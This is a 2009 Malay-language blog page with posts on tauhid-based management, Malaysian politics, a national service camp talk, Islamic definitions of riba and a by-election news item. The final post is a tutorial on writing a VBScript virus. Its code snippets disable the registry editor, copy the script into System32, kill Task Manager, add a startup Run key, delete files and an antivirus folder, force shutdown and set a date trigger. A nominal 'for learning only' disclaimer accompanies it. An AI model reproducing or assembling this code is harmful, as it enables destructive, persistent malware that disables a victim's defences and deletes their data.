Monday, April 27, 2009

PENDEKATAN TAUHID DALAM PENGURUSAN DAN PENTADBIRAN

Pengurusan dan pentadbiran menggunakan pendekatan tauhid merupakan satu kaedah yang berpaksikan tauhid kepada Allah S.W.T untuk membina peradaban yang diredai oleh Allah S.W.T. Ia bertanggungjawab menghapuskan ‘al-fasad’ iaitu kerosakan berupa rasuah, penyelewengan, kezaliman dan penindasan yang mampu melumpuhkan sistem pentadbiran dan pengurusan apa jua organisasi di muka bumi ini. Bencana yang menimpa masyarakat Islam dewasa ini tidak lain berpunca daripada kurangnya pengukuhan ilmu tauhid dalam diri seseorang pekerja muslim. Malah, kerosakan aqidah mereka lebih ketara apabila diracuni dengan kefahaman meterialisme yang mengutamakan kepentingan duniawi melebihi segala-galanya.

Memahami tauhid akan menyelamatkan diri seseorang individu dan pentadbir daripada menjadi hamba kepada harta benda. Mereka pasti tidak lalai daripada tugas dan kewajipan yang diamanahkan demi semata-mata untuk keredaan Allah S.W.T. Mereka mencari rezeki yang halal dan membelanjakannya pada jalan yang boleh menghampirkan dirinya kepada Allah S.W.T.

Memahami tauhid boleh membentuk manusia supaya tidak bertuhankan nafsu. Ini disebabkan nafsu itu sendiri adalah salah satu daripada kurniaan Allah yang dianugerahkan kepada manusia untuk menyempurnakan sifat dan kejadian manusia. Nafsu dijadikan sebagai ujian kepada manusia untuk membezakan siapakah yang beribadah kepada Allah S.W.T dan siapakah yang pula kufur atau bertuhankan nafsu.

Mereka yang berpegang kepada tauhid ini selama-lamanya tidak akan diperhambakan oleh manusia melalui apa cara sekalipun. Ia tidak akan menjadi pengampu dan menjadi orang suruhan oleh sesiapa sahaja untuk untuk mendapatkan tempat, keutamaan dan perhatian. Ini disebabkan oleh keyakinannya bahawa segalanya itu menjadi hak milik mutlak Allah S.W.T dan manusia hanya menjadi sebagai pemegang amanah sahaja.

Sunday, April 26, 2009

Satu Tinjauan Terhadap Senario Politik Malaysia

PRU-12 merupakan detik permulaan tafsiran politik alaf baru para politikus Malaysia. Pelbagai kritikan, idea, cadangan dan komen telah dikeluarkan dari kotak pemikiran para penganalisis politik berhubung PRU-12. Ramai yang melontarkan pandangan bahawa ini satu perkembangan sihat dalam situasi politik tanahair yang memperlihatkan kesuburan demokrasi telah wujud dan telah diterjemahkan dalam PRU-12. Walapun demikian tidak kurang juga penganalisis politik yang berpendapat bahawa keputusan PRU-12 hanya sebagai cara rakyat meluahkan perasaan terhadap ketidakpuasaan hati mereka terhadap wakil-wakil rakyat setempat dan mungkin dengan cara ini akan menyedarkan para pemimpin mereka terhadap keperluan serta keinginan para pengundi untuk didengari. Namun apa yang pasti keputusan PRU-12 sedikit-sebanyak telah mengganggu-gugat kestabilan politik negara. Lantaran daripada itu para pemimpin kanan parti pemerintah telah mendesak agar perubahan drastik mesti dilakukan segera demi memulihkan keyakinan rakyat terhadap parti pemerintah.

Bertitik tolak daripada keputusan PRU-12, kita telah diperlihatkan dengan pelbagai sandiwara politik oleh politikus demi kepentingan survival politik mereka. Seringkali rakyat disajikan dengan menu yang sama.... antara hidangannya pilihanraya kecil yang tidak bernoktah. Pembangkang telah mengekploitasi sepenuhnya keputusan PRU-12 dengan mengadakan pelbagai bentuk gerakan politik demi mencapai impian master-mind mereka untuk menjadi pemimpin no. 1 negara. Tetapi timbul satu persoalan besar mampukah tiga parti tunjang utama pembangkang yang membentuk satu pakatan yang mempunyai tiga orang pemimpin yang berlainan selera politik, membentuk kerajaan impian rakyat? Bolehkah rakyat Malaysia percaya barisan pembangkang yang mempunyai dasar perjuangan yang berlainan?

Dalam keadaan sebegini menuntut kebijaksanaan politik daripada semua politikus dalam membuat keputusan politik demi kepentingan rakyat seperti kata pepatah “jangan sampai menang jadi arang, kalah jadi abu”. Isu-isu berkaitan politik kini semakin kronik, dan pasaran saham pun tidak stabil dan sering menimbulkan kegusaran keyakinan terhadap pasaran Malaysia. Ini memberi kesan kepada para peniaga atau usawahan IKS, badan-badan korporat serta seluruh agensi yang terlibat dalam pemacuan ekonomi Malaysia akan merasa tempiasnya nanti.

Saya tidak merasakan perkembangan positif dapat dibuat dalam masa terdekat ini kerana kestabilan politik tidak begitu baik berbanding sebelum PRU-12. Namun demikian saya menaruh harapan yang cukup tinggi bahawa saatnya akan tiba dimana kestabilan politik dapat dikembalikan kerana pandangan ini disandarkan dengan peralihan kuasa baru-baru ini. Dengan berlakunya peralihan kuasa ini dapatlah mengembalikan keyakinan rakyat terhadap parti pemerintah dan parti pemerintah harus bersedia membuat perubahan dan memahami suara rakyat.

Kem Shan Shui Dalam Kenangan

Pada 20 April 2009 saya telah dijemput sebagai penceramah jemputan bagi Program Integrasi Program Latihan Khidmat Negara di Kem Shan Shui Tawau di bawah Staza Corporation Sdn. Bhd. Program ini mengambil selama lima hari iaitu bermula 20.04.2009 dan berakhir pada 24.04.2009.




























Penulis Bersama Rakan penceramah disamping Pelatih PLKN


Saturday, April 25, 2009

RIBA?

Riba bermaksud:

  • Bahasa: bertambah/ tambahan/ mengembang/ meninggi/ lebihan kepada sesuatu.
  • Syarak/ istilah: setiap tambahan yang tiada timbal balas tukarannya/ tambahan kepada sesuatu (kefahaman umum) Atau; tambahan ke atas harta pokok tanpa mengikut kontrak jual beli (konteks hutang).


Mazhab Shafie:

Riba kontrak ke atas tukaran tertentu yang tidak diketahui persamaannya pada ukuran yang diakui syarak semasa berkontrak atau penangguhan kedua-dua atau salah tukaran barangan tersebut.


Mazhab Maliki:

Riba adalah lebihan pada bilangan atau pada timbangan yang sebenar atau samara-samar dan menangguhkan.


Mazhab Hanafi:

Riba adalah lebihan yang tidak setara tukarannya mengikut ukuran yang diakui oleh syarak dengan syarat-syarat yang dikenakan oleh salah satu pihak yang berkontrak dalam kontrak pertukaran.


Mazhab Hambali:

Riba adalah melebihkan sesuatu dan menangguhkan sesuatu yang tertentu dengan sesuatu.


Ulama Tafsir:

Riba adalah tambahan yang diambil oleh pemiutang daripada penghutang kerana menangguhkan tempoh pembayaran


Pendapat lain terhadap riba:

Menurut Smith bunga adalah pampasan oleh penghutang kepada pemiutang kerana keuntungan yang mungkin diperolehinya daripada menangguhkan hutang tersebut atau pembayaran bagi modal tersebut. Begitu juga dengan kerajaan Henry VII iaitu dalam statut 1457 & 1945 memberi takrifan kepada usury iaitu perbuatan mengambil apa-apa lebihan daripada wang yang dipinjamkan bagi hutang yang sama. Ibn Hajar al-Asqalani menyatakan bahawa tidak ada perbezaan antara riba, bunga & usury kerana istilah terlibat itu boleh dipakai kepada semua jenis jual beli yang haram.


Terdapat dua jenis riba iaitu riba Fadhl dan riba Nasiah. Perkataan nasiah bererti penundaan tempoh pembayaran yang dibenarkan kepada si pemiutang. Ia dikenali sebagai nasiah kerana pemiutang dikatakan membenarkan penundaan bayaran hutang dengan ganti rugi tambahan ke atas pokok modalnya. Manakala fadhl menyatakan lebihan yang dikenakan dalam pertukaran atau jualan barang yang sama jenisnya seperti gandum, padi, lembu, kambing.


Sumber-sumber pengharaman riba:

  • Al-Quran: riba al-Nasiaah – riba ini terlibat dalam bahan-bahan ribawi
  • Al-Sunnah – riba diketegorikan kepada empat:
    1. Riba al-Fadhl – riba ini terlibat dalam bahan-bahan ribawi
    2. Riba Yad – riba ini terlibat dalam bahan-bahan ribawi
    3. Riba Nasa – riba ini terlibat dalam bahan-bahan ribawi
    4. Riba Qard – riba pinjaman

Saturday, April 18, 2009

Najib: BN may not contest Penanti by-election.....Pls! Enter

PEKAN: Barisan Nasional might not contest the Penanti state by-election if it obtains the consensus of all component parties, said Prime Minister Datuk Seri Najib Tun Razak.

In this context, Najib said he would hold a meeting with the Umno Supreme Council and meet with the presidents of the Barisan component parties to discuss the matter.

"I will raise the matter at the next Umno Supreme Council meeting. If I don't have the time, I will bring it up to the Political Bureau, and discuss with the Barisan component party presidents," he said.

Penanti: Idea yang bagus... Sila Kilk...

Idea ini pernah diperbualkan menjelang pilihanraya kecil Permatang Pauh tahun lalu.Ini bila mana Ahli Parlimen PKR kawasan itu Datin Seri Wan Azizah Ismail ‘ suka-suka’ nak letak jawatan untuk membolehkan suaminya Datuk Seri Anwar Ibrahim bertanding untuk ganti tempatnya.Ada dikalangan pimpinan Barisan Nasional yang cadangkan agar ia tidak bertanding semasa pilihanraya kecil itu kerana membazirkan wang rakyat saja.Namun ada yang tak setuju kerana bimbang ada yang mempersoalkan dari segi moral BN tak mahu letak calon.Kini nampaknya sudah tiga kali PKR buat perangai.Setelah Permatang Pauh,Bukit Selambau dimana wakil rakyatnya V Arumugan letak jawatan kerana sebab peribadi…dan yang terbaru Penanti kerana krisis dalaman yang melibatkan wakil rakyat dan bekas Timbalan ketua Menteri Pulau Pinang Fairus Khairuddin.Jumaat Perdana Menteri Datuk Seri Najib Tun Razak yang diminta mengulasnya oleh para wartawan pada satu majlis di Klang mempersoalkan tindak tanduk PKR nak membazirkan wang rakyat lagi menerusi pilihanraya kecil

Thursday, April 2, 2009

Cara mudah membuat virus "versi 1"

Sebelum itu, berikut ini cara-cara paling senang untuk membuat virus. Semua hal dibawah ini hanya sebagai penambah pengetahuan kita saja dan tidak boleh disalah gunakan untuk hal-hal yang bersifat merosak. Dan saya tidak bertanggung jawab jika itu terjadi. Sekarang kita akan membahaskan cara paling senang membuat virus pake vbs file. pertama, berikut ini hal-hal yang harus kita lakukan sebelum membuat virus.

# kelengkapan komputer berikut monitor,cpu,mouse,keyboard, dll (wajib)
# kita harus menyiapkan sebuah file yang ber-ekstensi vbs (*.vbs)

Untuk eksekusi pertama, yang dilakukan virus biasanya mengubah registry. Biarkan kelihatan rasmi ataupun asal :-). misalnya:

1. mendisable regedit. Yang kita tulis:
On Error Resume Next(arahan ini digunakan pada file vb
supaya kalau ada yang salah bisa dilanjutkan ke kode selanjutnya)
CreateObject("WScript.Shell").run "cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\policies\system /v
disableregistrytools /t reg_dword /d ""1"" /f", vbhide

sebenarnya banyak cara untuk mendisable regedit. misalnya begini:
CreateObject("WScript.Shell").regwriteHKEY_CURRENT_USERsoftware\microsoft\windows\currentversion\policies\systemdisableregistrytools", 1, "REG_DWORD"
Lalu mengubah registry yang lain.
2. mengcopykan diri ke direktory lain

CreateObject("Scripting.FileSystemObject").
GetFile(WScript.ScriptFullName).Copy "c:\windows\system32\virus.vbs"
Ada juga cara lain dengan kide seperti ini:
On Error Resume Next
createobject("scripting.filesystemobject").copyfile wscript.scriptfullname,
createobject("scripting.filesystemobject")
.getspecialfolder(1) & "\virus.vbs"
misalnya untuk mengcopykan diri ke direktory C:\WINDOWS\System32
dengan nama virus.vbs
.getspecialfolder(0) digunakan untuk direktory WINDOWS
.getspecialfolder(1) digunakan untuk direktory SYSTEM32 pada windowsXP
.getspecialfolder(2) digunakan untuk direktory Temporary

3. Membunuh proses-digunakan untuk membunuh proses
(proses adalah program yang sedang berjalan) misalnya kita akan membunuh proses taskmanager
On Error Resume Next
CreateObject("WScript.Shell")
.run "taskkill /f /im taskmgr.exe", vbhide

4. Menjalankan virus pada saat startup atau saat windows dihidupkan.
menggunakan regedit
On Error Resume Next
CreateObject("WScript.Shell").RegWrite "HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\CurrentVersion\Run\virus"
, "c:\windows\system32\virus.vbs"
(menjalankan virus yang berada di direktory c:\windows\system32
dengan nama virus.vbs)

5. Menghapus File / Folder - agar virus yang kita buat tidak banyak menggunakan script boleh di singkat seperti ini:
On Error Resume Next
set hapus = CreateObject("Scripting.FileSystemObject")
hapus.DeleteFile "C:\xxx.exe" '(menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder "C:\antivirus" '(menghapus folder antivirus di direktory C:\)
6.Merestart Windows
CreateObject("WScript.Shell").run "shutdown -r -f -t 60", vbhide
merestart windows dalam waktu 60 sekon

7.Meng-ShutDown Windows
CreateObject("WScript.Shell").run "shutdown -s-f -t 60", vbhide
mematikan windows dalam waktu 60 sekon :)yang berbeza hanya
"shutdown -s-f -t 60"
S = untuk shutdown dan
R = untuk reboot\restart

8. Mengaktifkan Virus Pada Waktu tertentu
If day(now) = 1 and month(now) = 3 and year(now) = 2009 then
'(masukkan kode virus disini)
End if
'misalnya kalau mahu mengaktifkan pada tanggal 1, bulan 3
'dan tahun 2009

Ingat!!! Jangan disalahgunakan…. Ini hanya untuk tujuan pembelajaran ataupun pengetahuan umum!!!!!